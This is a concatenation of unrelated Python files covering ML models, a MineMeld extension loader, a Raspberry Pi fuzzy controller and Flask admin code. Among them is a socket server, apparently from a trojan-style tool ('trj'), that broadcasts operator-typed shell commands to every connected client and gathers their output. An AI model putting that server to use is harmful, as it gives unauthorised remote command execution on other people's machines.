activated_extensions[epvalue.ep.dist.project_name] = ActivatedExtension(
location=location,
**metadata
)
return activated_extensions
def _load_metadata_from_wheel(extpath, extname=None):
wheel_name = extname
if extname is None:
wheel_name = os.path.basename(extpath)
project_name, version, _ = wheel_name.split('-', 2)
metadata_path = '{}-{}.dist-info/METADATA'.format(project_name, version)
with ZipFile(extpath, 'r') as wheel_file:
metadata_file = wheel_file.open(metadata_path, 'r')
metadata_lines = metadata_file.read()
metadata = _read_metadata(metadata_lines)
# classifier framework :: minemeld should be in METADATA
# for this to be an extension
classifiers = metadata.get_all('Classifier')
if classifiers is None:
return None
for c in classifiers:
if c.lower() == 'framework :: minemeld':
break
else:
return None
ie_metadata = {}
for field in InstalledExtension._fields:
if field == 'path' or field == 'entry_points':
continue
ie_metadata[field] = metadata.get(METADATA_MAP[field], None)
entry_points = None
try:
ep_path = '{}-{}.dist-info/entry_points.txt'.format(project_name, version)
with ZipFile(extpath, 'r') as wheel_file:
ep_file = wheel_file.open(ep_path, 'r')
ep_contents = ep_file.read()
entry_points = _read_entry_points(ep_contents)
except (IOError, OSError):
pass
ie_metadata['entry_points'] = entry_points
return InstalledExtension(
path=extpath,
**ie_metadata
)
def _load_metadata_from_dir(extpath):
with open(os.path.join(extpath, 'minemeld.json'), 'r') as f:
metadata = json.load(f)
return InstalledExtension(
name=metadata['name'],
version=metadata['version'],
author=metadata['author'],
author_email=metadata.get('author_email', None),
description=metadata.get('description', None),
url=metadata.get('url', None),
entry_points=metadata.get('entry_points', None),
path=extpath
)
def _is_activated(installed_extension, activated):
activated_extension = activated.get(installed_extension.name, None)
if activated_extension is None:
return False
if activated_extension.version != installed_extension.version:
return False
if installed_extension.path == activated_extension.location:
return True
if activated_extension.location == 'site-packages' and \
installed_extension.path.endswith('.whl'):
return True
return False
def get_metadata_from_wheel(wheelpath, wheelname=None):
return _load_metadata_from_wheel(wheelpath, wheelname)
def installed_extensions(installation_dir):
_installed_extensions = []
entries = os.listdir(installation_dir)
for e in entries:
epath = os.path.join(installation_dir, e)
# check if this is a wheel
if e.endswith('.whl'):
try:
installed_extension = _load_metadata_from_wheel(epath)
if installed_extension is None:
continue
_installed_extensions.append(installed_extension)
except (ValueError, IOError, KeyError, OSError) as excpt:
LOG.error(u'Error extracting metadata from {}: {}'.format(e, str(excpt)))
# check if it is a directory
elif os.path.isdir(epath):
try:
installed_extension = _load_metadata_from_dir(epath)
if installed_extension is None:
continue
_installed_extensions.append(installed_extension)
except (IOError, OSError, KeyError) as excpt:
LOG.error(u'Error extracting metadata from {}: {}'.format(e, str(excpt)))
return _installed_extensions
def activated_extensions():
return _activated_extensions()
def extensions(installation_dir):
_extensions = []
_installed = installed_extensions(installation_dir)
_activated = activated_extensions()
for installed_extension in _installed:
_extension_activated = _is_activated(installed_extension, _activated)
_extensions.append(ExternalExtension(
installed=True,
activated=_extension_activated,
**installed_extension._asdict()
))
if _extension_activated:
_activated.pop(installed_extension.name)
for _activated_extension in _activated.values():
_adict = _activated_extension._asdict()
_adict.pop('location')
_extensions.append(ExternalExtension(
installed=False,
activated=True,
path=None,
**_adict
))
return _extensions
def freeze(installation_dir):
_freeze = []
_extensions = extensions(installation_dir)
for e in _extensions:
if not e.activated:
continue
if not e.installed:
continue
if e.path.endswith('.whl'):
_freeze.append(e.path)
else:
_freeze.append('-e {}'.format(e.path))
return _freeze
def load_frozen_paths(freeze_file):
for l in freeze_file:
l = l.strip()
if not l.startswith('-e '):
continue
_, epath = l.split(' ', 1)
if epath not in sys.path:
LOG.info('Extension path {!r} not in sys.path, adding'.format(epath))
sys.path.append(epath)
|
11556497
|
from .uncset import UncSet
from .uncparam import UncParam
from .reformulate import (PolyhedralTransformation,
EllipsoidalTransformation,
GeneratorTransformation,
WGPTransformation)
from .solver import (ReformulationSolver,
CuttingPlaneSolver)
from .generator import RobustConstraint
from .components import AdjustableVar
from .adjustable import LDRAdjustableTransformation
|
11556602
|
import socket
import threading
import sys
import monoclient
import decorators
import loads
def request_server_option():
"""
Is used to request the option and prints it.
Returns
-------
option: int
The option that has to be returned
"""
colors = decorators.Colors()
option = 0
try:
option = int(input(f"{colors.OK}Select what do you want to do: {colors.ENDC}"))
except ValueError as e:
print(f"{colors.ERR}Error, invalid value for base 10 {e}{self.__colors.ENDC}")
except Exception as e:
print(f"{colors.ERR}Error, invalid iteral / option... {e}{colors.ENDC}")
return option
class ServerConfiguration():
"""
The class is used to handle all the configuration for an specific
server, and capsule it.
"""
def __init__(self, port, ip, dcf, bites, dmsg, emsg):
"""
The constructor method for the ServerConfiguration class.
From here all the attributes of the class are created.
Parameters
----------
port: int
The port of the server
ip: str
The ip address of the server
dcf: str
The format the server uses
bites: int
The maximum number of bites of the
server.
"""
self.__port = port
self.__ip = ip
self.__dcf = dcf
self.__bites = bites
self.__disconnect_msg = dmsg
self.__exit_msg = emsg
def __repr__(self):
"""
Returns a short representation of all the information.
"""
return f"{self.get_port()}: {self.get_ip()}"
def setup_server(self):
"""
Set ups the complete server using the return statement.
Returns
-------
port, ip, dcf, bites
"""
return (
self.get_port(),
self.get_ip(),
self.get_dcf(),
self.get_bites(),
self.get_dmsg(),
self.get_emsg()
)
def get_port(self):
return self.__port
def get_ip(self):
return self.__ip
def get_dcf(self):
return self.__dcf
def get_bites(self):
return self.__bites
def get_dmsg(self):
return self.__disconnect_msg
def get_emsg(self):
return self.__exit_msg
class Server:
"""
This class is used to manage all the servers trj uses and to manage
the sockets.
"""
def __init__(self, conf):
"""
This is the constructor method for the Server class, from here all the
attributes of the class are created
Parameters
----------
conf: ServerConfiguration
The configuration of the sever
"""
self.port, self.ip, self.dcf, self.bites, dmsg, emsg = conf.setup_server()
self.addr = (self.ip, self.port)
self.__loop_thread = None
self.disconnect = dmsg # msg to disconnect
self.exit_command = emsg
# create the actual server of the instance
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind(self.addr) # bind the server to the addr
self.clients = {} # stores configuration of each client
# colors
self.__colors = decorators.Colors()
# loop hash for the options
self.__loop_func_hash = {
0: self.__close,
1: self.__send_to_all_clients,
2: self.__type_a_message,
3: self.__clean_screen
}
def broadcast(self, msg):
client_data_register = list()
for i, client in self.clients.items():
client.send(msg, self.dcf)
client_data = client.recv(self.bites, self.dcf)
client_data_register.append(client_data)
return client_data_register
def __close(self):
"""
Closes all the clients and then closes the server and exits the app.
"""
for client in self.clients.values():
client.close()
self.clients = []
print("Press CTRL+C 2 times to exit the server...")
decorators.exit()
def __send_to_all_clients(self):
"""
Request a command and sends that command to all the clients connected
(kind of a broadcast)
"""
print(f"Remember to type {self.exit_command} for going back to the menu...")
while True:
command = input(">>> ")
if command == self.exit_command:
break
cdr = self.broadcast(command)
print(f"{self.__colors.INFO}{command} sended to {len(cdr)} clients{self.__colors.ENDC}")
def __type_a_message(self):
maximum_lines = 30
lines = []
for i in range(maximum_lines):
uni = input() or "" # uni = user input
if uni == self.exit_command:
break
else:
lines.append(uni)
text = '\n'.join(lines)
self.broadcast(f'echo "{text}"')
def __clean_screen(self):
self.broadcast("clear")
def __loop(self):
"""
This method is used to loop the options and depending on what the
server manager types, it will invoke other methods.
"""
looping = True
# create the simple hash
while looping:
key = 0
# Print the options
decorators.print_server_options(decorators.get_hash())
key = request_server_option()
# Get the option and start the hash map
try:
if key == 0:
self.__close()
decorators.exit()
else:
print(f"Eecuting function {key}...")
self.__loop_func_hash[key]() # the position 0 is the function
except KeyError as e:
print(f"{self.__colors.ERR}Invalid option... {option}{self.__colors.ENDC}")
self.__close()
except Exception as e:
print(f"{self.__colors.FAIL}Internal crash at looping options... {e}{self.__colors.ENDC}")
self.__close()
def __handle_client(self, client_id, conf):
"""
This method is a thread used to handle all the clients that connect to
the server.
Parameters
----------
client_id: int
the number to determine the client
conf: monoclient.ClientConfiguration
The configuration of the client
"""
client = monoclient.Client(client_id, conf)
# some debug from the server
print(f"\n{self.__colors.INFO}[NEW CONNECTION] {client.conf.addr} connected.{self.__colors.ENDC}")
# append the connection to the clients
self.clients[client_id] = client
def start(self):
"""
This method is used to start the server itself using the .listen() method
and then starting a while loop to create the threads
Parameters: self => The Server() class
"""
# start the server and listen it
self.server.listen()
running = True
while running:
try:
conn, addr = self.server.accept()
client_configuration = monoclient.ClientConfiguration(conn, addr)
# ct stands for client total (the counter of the client)
ct = len(self.clients)
# create the thread for the self.handle_client method
thread = threading.Thread(target=self.__handle_client, args=[ct, client_configuration])
thread.start()
# check if the loop thread is already working, if it's restart it.
if self.__loop_thread != None:
# If the loop thread is not equal to none, we should end this
# thread and reset it to None.o
self.__loop_thread.join()
self.__loop_thread = None
# Set the loop thread to the actual thread
self.__loop_thread = threading.Thread(target=self.__loop)
self.__loop_thread.start()
except Exception as e:
# report the bug informing the user
print(f"[SERVER CRASH]: Fatal error, {e}")
def main(port, ip, dcf, bites, dmsg, emsg):
"""
This function actually starts running the server, using 4
paramteres.
"""
server_configuration = ServerConfiguration(port, ip, dcf, bites, dmsg, emsg)
if "-c" in sys.argv:
print(f"SERVER CONFIGURATION: {server_configuration.setup_server()}")
server = Server(server_configuration)
server.start()
if __name__ == '__main__':
ip, port, dcf, bites, dmsg, emsg = decorators.setup_yaml(loads.load_configuration())
# actually run the server
# check if the user did python3 server.py <ip> <port>
# create the server
arg = sys.argv
if len(arg) >= 3:
ip = arg[1]
port = int(arg[2])
main(port, ip, dcf, bites, dmsg, emsg)
|
11556606
|
import GPy
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_array
from sklearn.metrics import r2_score
from scipy.cluster.vq import kmeans2
from typing import Tuple
class SparseGPR(BaseEstimator, RegressorMixin):
def __init__(
self,
kernel=None,
inference="vfe",
n_inducing=10,
max_iters=200,
optimizer="scg",
n_restarts=10,
verbose=None,
alpha=0.5,
):
self.kernel = kernel
self.n_inducing = n_inducing
self.inference = inference
self.max_iters = max_iters
self.optimizer = optimizer
self.n_restarts = n_restarts
self.verbose = verbose
self.alpha = alpha
def fit(self, X: np.ndarray, y: np.ndarray) -> None:
# check Array
X = check_array(X)
# get dimensions of inputs
d_dimensions = X.shape[1]
# default Kernel Function
if self.kernel is None:
self.kernel = GPy.kern.RBF(input_dim=d_dimensions, ARD=True)
# Get inducing points
z = kmeans2(X, self.n_inducing, minit="points")[0]
# Kernel matrix
self.gp_model = GPy.models.SparseGPRegression(X, y, kernel=self.kernel, Z=z)
# set the fitc inference
if self.inference.lower() == "vfe":
self.gp_model.inference_method = (
GPy.inference.latent_function_inference.VarDTC()
)
elif self.inference.lower() == "fitc":
self.gp_model.inference_method = (
GPy.inference.latent_function_inference.FITC()
)
elif self.inference.lower() == "pep":
self.gp_model.inference_method = GPy.inference.latent_function_inference.PEP(
self.alpha
)
else:
raise ValueError(f"Unrecognized inference method: {self.inference}")
# Make likelihood variance low to start
self.gp_model.Gaussian_noise.variance = 0.01
# Optimization
if self.n_restarts >= 1:
self.gp_model.optimize_restarts(
num_restarts=self.n_restarts,
robust=True,
verbose=self.verbose,
max_iters=self.max_iters,
)
else:
self.gp_model.optimize(
self.optimizer, messages=self.verbose, max_iters=self.max_iters
)
return self
def display_model(self):
return self.gp_model
def predict(
self, X: np.ndarray, return_std: bool = False, noiseless: bool = True
) -> Tuple[np.ndarray, np.ndarray]:
if noiseless == True:
include_likelihood = False
elif noiseless == False:
include_likelihood = True
else:
raise ValueError(f"Unrecognized argument for noiseless: {noiseless}")
mean, var = self.gp_model.predict(X, include_likelihood=include_likelihood)
if return_std:
return mean, np.sqrt(var)
else:
return mean
|
11556611
|
import json
from abc import ABCMeta, abstractmethod
class ConfigurableTrainerFitResult:
"""
Result object of a ConfigurableModel fit. Contains a score for the fitted model and also additional metadata.
"""
def __init__(self, score: float, score_name: str, score_epoch: int = -1, additional_metadata: dict = None):
self.score = score
self.score_name = score_name
self.score_epoch = score_epoch
self.additional_metadata = additional_metadata if additional_metadata is not None else {}
def __str__(self):
fit_result_str = f"Score Name: {self.score_name}\n" \
f"Score Value: {self.score:.3f}\n"
if self.score_epoch != -1:
fit_result_str += f"Score Epoch: {self.score_epoch}\n"
fit_result_str += f"Additional Metadata: {json.dumps(self.additional_metadata, indent=2)}"
return fit_result_str
class ConfigurableTrainer(metaclass=ABCMeta):
"""
Abstract configurable trainer class. Wraps a model and trainer to create an abstraction for hyper parameter tuning.
"""
@abstractmethod
def fit(self, params: dict) -> ConfigurableTrainerFitResult:
"""
Fits the model using the latest compiled configuration. Returns a FitResult object with the score for the model, the larger the better and
any additional metadata. An example for a score is returning the negative validation loss.
"""
raise NotImplementedError
|
11556633
|
import os
from bob.bio.base.test.dummy.database import database
import bob.io.image
# Creates a list of unique str
samples = [s.key for s in database.background_model_samples()]
def reader(sample):
data = bob.io.image.load(
os.path.join(database.database.original_directory, sample + database.database.original_extension)
)
return data
def make_key(sample):
return sample
|
11556636
|
import os
import sys
sys.path.insert(0, os.getcwd())
import numpy as np
import argparse
import json
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from models.pretraining_nasbench101 import configs
from utils.utils import load_json, preprocessing
from models.model import Model
from torch.distributions import MultivariateNormal
class Env(object):
def __init__(self, name, seed, emb_path, model_path, cfg, data_path=None, save=False):
self.name = name
self.model_path = model_path
self.emb_path = emb_path
self.seed = seed
self.dir_name = 'pretrained/dim-{}'.format(args.dim)
self.visited = {}
self.features = []
self.embedding = {}
self._reset(data_path, save)
def _reset(self, data_path, save):
if not save:
print("extract arch2vec from {}".format(os.path.join(self.dir_name, self.model_path)))
if not os.path.exists(os.path.join(self.dir_name, self.model_path)):
exit()
dataset = load_json(data_path)
self.model = Model(input_dim=5, hidden_dim=128, latent_dim=16, num_hops=5, num_mlp_layers=2, dropout=0, **cfg['GAE']).cuda()
self.model.load_state_dict(torch.load(os.path.join(self.dir_name, self.model_path).format(args.dim))['model_state'])
self.model.eval()
with torch.no_grad():
print("length of the dataset: {}".format(len(dataset)))
self.f_path = os.path.join(self.dir_name, 'arch2vec-{}'.format(self.model_path))
if os.path.exists(self.f_path):
print('{} is already saved'.format(self.f_path))
exit()
print('save to {}'.format(self.f_path))
for ind in range(len(dataset)):
adj = torch.Tensor(dataset[str(ind)]['module_adjacency']).unsqueeze(0).cuda()
ops = torch.Tensor(dataset[str(ind)]['module_operations']).unsqueeze(0).cuda()
adj, ops, prep_reverse = preprocessing(adj, ops, **cfg['prep'])
test_acc = dataset[str(ind)]['test_accuracy']
valid_acc = dataset[str(ind)]['validation_accuracy']
time = dataset[str(ind)]['training_time']
x,_ = self.model._encoder(ops, adj)
self.embedding[ind] = {'feature': x.squeeze(0).mean(dim=0).cpu(), 'valid_accuracy': float(valid_acc), 'test_accuracy': float(test_acc), 'time': float(time)}
torch.save(self.embedding, self.f_path)
print("finish arch2vec extraction")
exit()
else:
self.f_path = os.path.join(self.dir_name, self.emb_path)
print("load arch2vec from: {}".format(self.f_path))
self.embedding = torch.load(self.f_path)
for ind in range(len(self.embedding)):
self.features.append(self.embedding[ind]['feature'])
self.features = torch.stack(self.features, dim=0)
print('loading finished. pretrained embeddings shape: {}'.format(self.features.shape))
def get_init_state(self):
"""
:return: 1 x dim
"""
random.seed(args.seed)
rand_indices = random.randint(0, self.features.shape[0])
self.visited[rand_indices] = True
return self.features[rand_indices], self.embedding[rand_indices]['valid_accuracy'],\
self.embedding[rand_indices]['test_accuracy'], self.embedding[rand_indices]['time']
def step(self, action):
"""
action: 1 x dim
self.features. N x dim
"""
dist = torch.norm(self.features - action.cpu(), dim=1)
knn = (-1 * dist).topk(dist.shape[0])
min_dist, min_idx = knn.values, knn.indices
count = 0
while True:
if len(self.visited) == dist.shape[0]:
print("cannot find in the dataset")
exit()
if min_idx[count].item() not in self.visited:
self.visited[min_idx[count].item()] = True
break
count += 1
return self.features[min_idx[count].item()], self.embedding[min_idx[count].item()]['valid_accuracy'], \
self.embedding[min_idx[count].item()]['test_accuracy'], self.embedding[min_idx[count].item()]['time']
class Policy(nn.Module):
def __init__(self, hidden_dim1, hidden_dim2):
super(Policy, self).__init__()
self.fc1 = nn.Linear(hidden_dim1, hidden_dim2)
self.fc2 = nn.Linear(hidden_dim2, hidden_dim1)
self.saved_log_probs = []
self.rewards = []
def forward(self, input):
x = F.relu(self.fc1(input))
out = self.fc2(x)
return out
class Policy_LSTM(nn.Module):
def __init__(self, hidden_dim1, hidden_dim2):
super(Policy_LSTM, self).__init__()
self.lstm = torch.nn.LSTMCell(input_size=hidden_dim1, hidden_size=hidden_dim2)
self.fc = nn.Linear(hidden_dim2, hidden_dim1)
self.saved_log_probs = []
self.rewards = []
self.hx = None
self.cx = None
def forward(self, input):
if self.hx is None and self.cx is None:
self.hx, self.cx = self.lstm(input)
else:
self.hx, self.cx = self.lstm(input, (self.hx, self.cx))
mean = self.fc(self.hx)
return mean
def select_action(state, policy):
"""
MVN based action selection.
:param state: 1 x dim
:param policy: policy network
:return: action: 1 x dim
"""
mean = policy(state.view(1, state.shape[0]))
mvn = MultivariateNormal(mean, torch.eye(state.shape[0]).cuda())
action = mvn.sample()
policy.saved_log_probs.append(torch.mean(mvn.log_prob(action)))
return action
def finish_episode(policy, optimizer):
R = 0
policy_loss = []
returns = []
for r in policy.rewards:
R = r + 0.8 * R
returns.append(R)
returns = torch.Tensor(policy.rewards)
returns = returns - 0.95
for log_prob, R in zip(policy.saved_log_probs, returns):
policy_loss.append(-log_prob * R)
optimizer.zero_grad()
policy_loss = torch.mean(torch.stack(policy_loss, dim=0))
print("average reward: {}, policy loss: {}".format(sum(policy.rewards)/len(policy.rewards), policy_loss.item()))
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
policy.hx = None
policy.cx = None
def reinforce_search(env, args):
""" implementation of arch2vec-REINFORCE """
policy = Policy_LSTM(args.dim, 128).cuda()
optimizer = optim.Adam(policy.parameters(), lr=1e-2)
counter = 0
BEST_VALID_ACC = 0.9505542318026224
BEST_TEST_ACC = 0.943175752957662
MAX_BUDGET = 1.5e6
rt = 0
state, _, _, time = env.get_init_state()
CURR_BEST_VALID = 0
CURR_BEST_TEST = 0
test_trace = []
valid_trace = []
time_trace = []
while rt < MAX_BUDGET:
for c in range(args.bs):
state = state.cuda()
action = select_action(state, policy)
state, reward, reward_test, time = env.step(action)
policy.rewards.append(reward)
counter += 1
rt += time
print('counter: {}, validation reward: {}, test reward: {}, time: {}'.format(counter, reward, reward_test, rt))
if reward > CURR_BEST_VALID:
CURR_BEST_VALID = reward
CURR_BEST_TEST = reward_test
valid_trace.append(float(BEST_VALID_ACC - CURR_BEST_VALID))
test_trace.append(float(BEST_TEST_ACC - CURR_BEST_TEST))
time_trace.append(rt)
if rt >= MAX_BUDGET:
break
finish_episode(policy, optimizer)
res = dict()
res['regret_validation'] = valid_trace
res['regret_test'] = test_trace
res['runtime'] = time_trace
save_path = os.path.join(args.output_path, 'dim{}'.format(args.dim))
if not os.path.exists(save_path):
os.mkdir(save_path)
print('save to {}'.format(save_path))
if args.emb_path.endswith('.pt'):
s = args.emb_path[:-3]
fh = open(os.path.join(save_path, 'run_{}_{}.json'.format(args.seed, s)),'w')
json.dump(res, fh)
fh.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="arch2vec-REINFORCE")
parser.add_argument("--gamma", type=float, default=0, help="discount factor (default 0.99)")
parser.add_argument("--seed", type=int, default=1, help="random seed")
parser.add_argument('--cfg', type=int, default=4, help='configuration (default: 4)')
parser.add_argument('--bs', type=int, default=16, help='batch size')
parser.add_argument('--dim', type=int, default=7, help='feature dimension')
parser.add_argument('--output_path', type=str, default='rl', help='rl/bo')
parser.add_argument('--emb_path', type=str, default='arch2vec.pt')
parser.add_argument('--model_path', type=str, default='model-nasbench-101.pt')
parser.add_argument('--saved_arch2vec', action="store_true", default=False)
args = parser.parse_args()
cfg = configs[args.cfg]
env = Env('REINFORCE', args.seed, args.emb_path, args.model_path, cfg, data_path='data/data.json', save=args.saved_arch2vec)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.set_num_threads(2)
reinforce_search(env, args)
|
11556675
|
import numpy as np
import torch
import torch.distributions as td
import torch.nn as nn
class DenseModel(nn.Module):
def __init__(self, feature_size: int, output_shape: tuple, layers: int, hidden_size: int, dist='normal',
activation=nn.ELU):
super().__init__()
self._output_shape = output_shape
self._layers = layers
self._hidden_size = hidden_size
self._dist = dist
self.activation = activation
# For adjusting pytorch to tensorflow
self._feature_size = feature_size
# Defining the structure of the NN
self.model = self.build_model()
def build_model(self):
model = [nn.Linear(self._feature_size, self._hidden_size)]
model += [self.activation()]
for i in range(self._layers - 1):
model += [nn.Linear(self._hidden_size, self._hidden_size)]
model += [self.activation()]
model += [nn.Linear(self._hidden_size, int(np.prod(self._output_shape)))]
return nn.Sequential(*model)
def forward(self, features):
dist_inputs = self.model(features)
reshaped_inputs = torch.reshape(dist_inputs, features.shape[:-1] + self._output_shape)
if self._dist == 'normal':
return td.independent.Independent(td.Normal(reshaped_inputs, 1), len(self._output_shape))
if self._dist == 'binary':
return td.independent.Independent(td.Bernoulli(logits=reshaped_inputs), len(self._output_shape))
raise NotImplementedError(self._dist)
|
11556680
|
from flask_login import current_user
from wtforms import ValidationError
from overhave.admin.views.base import ModelViewProtected
from overhave.db import Role
class DraftView(ModelViewProtected):
""" View for :class:`Draft` table. """
details_template = "draft_detail.html"
can_delete = True
column_list = ("id", "feature_id", "test_run_id", "pr_url", "published_by", "created_at", "status")
column_exclude_list = ("feature", "text") # type: ignore
column_details_list = (
"id",
"feature_id",
"test_run_id",
"pr_url",
"published_by",
"created_at",
"status",
"traceback",
)
column_sortable_list = ("id", "feature_id")
column_searchable_list = (
"test_run_id",
"published_by",
"pr_url",
)
column_filters = ("feature_id", "published_by", "created_at", "status")
def on_model_delete(self, model) -> None: # type: ignore
if not current_user.role == Role.admin:
raise ValidationError("Only administrator could delete published version of scenario!")
|
11556696
|
import matplotlib
matplotlib.use('Agg')
import numpy as np
import skfuzzy as fuzz
import matplotlib.pyplot as plt
import Adafruit_DHT
import RPi.GPIO as GPIO
import time
print('initialization...')
### initialization GPIO
relay_pin = 26
GPIO.setmode(GPIO.BCM)
GPIO.setup(relay_pin, GPIO.OUT)
sensor = Adafruit_DHT.DHT22
# DHT22 pin on Raspberry Pi
dht_pin = 23
########## INPUTS ########################
#Input Universe functions
temperature = np.arange(0, 11, 0.1)
humidity = np.arange(0, 11, 0.1)
# Input Membership Functions
# Temperature
temperature_cold = fuzz.gaussmf(temperature, 0, 1.5)
temperature_warm = fuzz.gaussmf(temperature, 5, 1.5)
temperature_hot = fuzz.gaussmf(temperature, 10, 1.5)
# Humidity
humidity_low = fuzz.trapmf(humidity, [0, 0, 1, 3])
humidity_high = fuzz.gaussmf(humidity, 10, 1.5)
########## OUTPUT ########################
# comfort
# Output Variables Domain
comfort = np.arange(0, 30, 0.1)
# Output Membership Function
comfort_low = fuzz.trimf(comfort, [0, 5, 10])
comfort_ave = fuzz.trimf(comfort, [10, 15, 25])
comfort_very = fuzz.trimf(comfort, [20, 25, 30])
def temperature_category(temperature_in=18):
temperature_cat_cold = fuzz.interp_membership(temperature, temperature_cold, temperature_in)
temperature_cat_warm = fuzz.interp_membership(temperature, temperature_warm, temperature_in)
temperature_cat_hot = fuzz.interp_membership(temperature, temperature_hot, temperature_in)
return dict(cold=temperature_cat_cold, warm=temperature_cat_warm, hot=temperature_cat_hot)
def humidity_category(humidity_in=2):
humidity_cat_low = fuzz.interp_membership(humidity, humidity_low, humidity_in)
humidity_cat_high = fuzz.interp_membership(humidity, humidity_high, humidity_in)
return dict(low=humidity_cat_low, high=humidity_cat_high)
# print membership
# Visualize these universes and membership functions
print('saving membership...')
fig, ax = plt.subplots(2, 1)
[t1, t2, t3] = ax[0].plot(temperature, temperature_cold, 'r', temperature, temperature_warm, 'm+', temperature,
temperature_hot, 'b--', label=['Temp. cold', 'Temp. warm', 'Temp. hot'])
ax[0].set_ylabel('Fuzzy membership')
ax[0].set_title('Temperature')
ax[0].set_ylim(-0.05, 1.05)
ax[0].set_xlim(0, 10)
lgd1 = ax[0].legend([t1, t2, t3], ['Temp. cold', 'Temp. warm', 'Temp. hot'], loc='center left', bbox_to_anchor=(1, 0.5))
[t1, t2] = ax[1].plot(humidity, humidity_low, 'r', humidity, humidity_high, 'b+')
ax[1].set_ylabel('Fuzzy membership')
ax[1].set_title('Humidity')
ax[1].set_ylim(-0.05, 1.05)
ax[1].set_xlim(0, 10)
lgd2 = ax[1].legend([t1, t2], ['Hum. low', 'Hum. high'], loc='center left', bbox_to_anchor=(1, 0.5))
plt.grid(True)
plt.tight_layout()
plt.show()
fig.savefig('fuzzy_mem_temp_hum.png', dpi=100, bbox_extra_artists=(lgd1, lgd2, ), bbox_inches='tight')
print('done')
# sensing and make decision
print('program is ready for making decision based fuzzy logic')
machine_state = -1
try:
while 1:
print('sensing...')
sen_humidity, sen_temperature = Adafruit_DHT.read_retry(sensor, dht_pin)
if humidity is not None and temperature is not None:
print('Sensing: Temperature={0:0.1f}*C Humidity={1:0.1f}%'.format(sen_temperature, sen_humidity))
sen_temperature = 18
sen_humidity = 80
# normalization
norm_temperature = sen_temperature / 60.0
norm_humidity = sen_humidity / 100.0
print('Normalization: Temperature={0:0.0001f} Humidity={1:0.0001f}'
.format(norm_temperature, norm_humidity))
temp_in = temperature_category(norm_temperature)
hum_in = humidity_category(norm_humidity)
print('fuzzy membership: Temperature={0} Humidity={1}'.format(temp_in, hum_in))
# Determine the weight and aggregate
rule1 = np.fmax(temp_in['hot'], hum_in['low'])
rule2 = temp_in['warm']
rule3 = np.fmax(temp_in['warm'], hum_in['high'])
imp1 = np.fmin(rule1, comfort_low)
imp2 = np.fmin(rule2, comfort_ave)
imp3 = np.fmin(rule3, comfort_very)
aggregate_membership = np.fmax(imp1, imp2, imp3)
# Defuzzify
result_comfort = fuzz.defuzz(comfort, aggregate_membership, 'centroid')
print(result_comfort)
# make decision based on experiment
if result_comfort >= 5.002:
if machine_state < 0:
machine_state = 1
print("turn on a machine")
GPIO.output(relay_pin, GPIO.HIGH)
else:
print("a machine already turn on")
else:
if machine_state > 0:
machine_state = 0
print("turn off a machine")
GPIO.output(relay_pin, GPIO.LOW)
else:
print("a machine already turn off")
time.sleep(2)
time.sleep(2)
except KeyboardInterrupt:
GPIO.output(relay_pin, GPIO.LOW)
GPIO.cleanup()
print('program is exit')
|
11556703
|
import sys
sys.path.append('../')
import torch
import torch.nn as nn
import math, random, sys
import argparse
from fast_jtnn import *
import rdkit
def load_model(vocab, model_path, hidden_size=450, latent_size=56, depthT=20, depthG=3):
vocab = [x.strip("\r\n ") for x in open(vocab)]
vocab = Vocab(vocab)
model = JTNNVAE(vocab, hidden_size, latent_size, depthT, depthG)
dict_buffer = torch.load(model_path)
model.load_state_dict(dict_buffer)
model = model.cuda()
torch.manual_seed(0)
return model
def main_sample(vocab, output_file, model_path, nsample, hidden_size=450, latent_size=56, depthT=20, depthG=3):
vocab = [x.strip("\r\n ") for x in open(vocab)]
vocab = Vocab(vocab)
model = JTNNVAE(vocab, hidden_size, latent_size, depthT, depthG)
dict_buffer = torch.load(model_path)
model.load_state_dict(dict_buffer)
model = model.cuda()
torch.manual_seed(0)
with open(output_file, 'w') as out_file:
for i in range(nsample):
out_file.write(str(model.sample_prior())+'\n')
if __name__ == '__main__':
lg = rdkit.RDLogger.logger()
lg.setLevel(rdkit.RDLogger.CRITICAL)
parser = argparse.ArgumentParser()
parser.add_argument('--nsample', type=int, required=True)
parser.add_argument('--vocab', required=True)
parser.add_argument('--model', required=True)
parser.add_argument('--output_file', required=True)
parser.add_argument('--hidden_size', type=int, default=450)
parser.add_argument('--latent_size', type=int, default=56)
parser.add_argument('--depthT', type=int, default=20)
parser.add_argument('--depthG', type=int, default=3)
args = parser.parse_args()
main_sample(args.vocab, args.output_file, args.model, args.nsample, args.hidden_size, args.latent_size, args.depthT, args.depthG)
|
11556719
|
import json
import os
from overrides import overrides
from typing import Any, List
from repro.data.output_writers import OutputWriter
from repro.data.types import InstanceDict
@OutputWriter.register("default")
class DefaultOutputWriter(OutputWriter):
"""
Writes a jsonl file with keys for the `instance_id`, `model_id`, and `prediction`.
"""
def __init__(self, include_input: bool = False):
super().__init__(True)
self.include_input = include_input
@overrides
def _write(
self,
instances: List[InstanceDict],
predictions: Any,
output_file_or_dir: str,
model_name: str,
*args,
**kwargs
) -> None:
output_file = output_file_or_dir
dirname = os.path.dirname(output_file)
if dirname:
os.makedirs(dirname, exist_ok=True)
with open(output_file, "w") as out:
for instance, prediction in zip(instances, predictions):
data = {
"instance_id": instance["instance_id"],
"model_id": model_name,
}
if self.include_input:
data["input"] = instance
data["prediction"] = prediction
out.write(json.dumps(data) + "\n")
|
11556735
|
import unittest
from myapp import create_app
from myapp.models.db_orm import db
from myapp.models.db_models import User
class TestModelUser(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
# self.client = self.app.test_client(use_cookies=True)
self.client = self.app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_password_setter(self):
user = User(password='Password!')
self.assertTrue(user.password_hash is not None)
def test_no_password_getter(self):
user = User(password='Password!')
with self.assertRaises(AttributeError):
user.password
def test_password_verification(self):
user = User(password='Password!')
self.assertTrue(user.verify_password('Password!'))
self.assertFalse(user.verify_password('<PASSWORD>!'))
def test_password_salts_are_random(self):
user1 = User(password='Password!')
user2 = User(password='Password!')
self.assertTrue(user1.password_hash != user2.password_hash)
|
11556764
|
from functools import wraps
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import csrf_exempt
